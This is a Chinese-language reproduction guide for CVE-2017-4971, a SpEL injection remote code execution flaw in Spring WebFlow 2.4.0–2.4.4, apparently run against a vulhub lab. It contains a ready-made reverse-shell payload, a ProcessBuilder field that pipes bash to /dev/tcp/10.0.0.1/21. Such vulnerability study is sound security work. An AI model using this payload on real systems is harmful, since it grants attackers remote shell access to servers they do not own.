menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2017-4971)Spring WebFlow 远程代码执行漏洞 chevron_right (CVE-2017-4971)Spring WebFlow 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2017-4971)Spring WebFlow 远程代码执行漏洞.md
    1.69 KB / 2021-07-15 20:04:40
        (CVE-2017-4971)Spring WebFlow 远程代码执行漏洞
    ================================================
    
    一、漏洞简介
    ------------
    
    Spring WebFlow
    是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其
    2.4.x
    版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
    
    二、漏洞影响
    ------------
    
    Spring Web Flow 2.4.0版本至2.4.4版本
    
    三、复现过程
    ------------
    
    首先访问`http://www.0-sec.org:8080/login`,用页面左边给出的任意一个账号/密码登录系统:![1.png](./resource/(CVE-2017-4971)SpringWebFlow远程代码执行漏洞/media/rId24.png)然后访问id为1的酒店`http://www.0-sec.org/hotels/1`,点击预订按钮"Book
    Hotel",填写相关信息后点击"Process"(从这一步,其实WebFlow就正式开始了):
    
    ![2.png](./resource/(CVE-2017-4971)SpringWebFlow远程代码执行漏洞/media/rId25.png)
    
    再点击确认"Confirm":
    
    ![3.png](./resource/(CVE-2017-4971)SpringWebFlow远程代码执行漏洞/media/rId26.png)此时抓包,抓到一个POST数据包,我们向其中添加一个字段(也就是反弹shell的POC):
    
        _(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
    
    ![4.png](./resource/(CVE-2017-4971)SpringWebFlow远程代码执行漏洞/media/rId27.png)(注意:别忘记URL编码)
    
    成功执行,获得shell:
    
    ![5.png](./resource/(CVE-2017-4971)SpringWebFlow远程代码执行漏洞/media/rId28.png)
    
    参考链接
    --------
    
    > https://github.com/vulhub/vulhub/tree/master/spring/CVE-2017-4971
    
    
    links
    file_download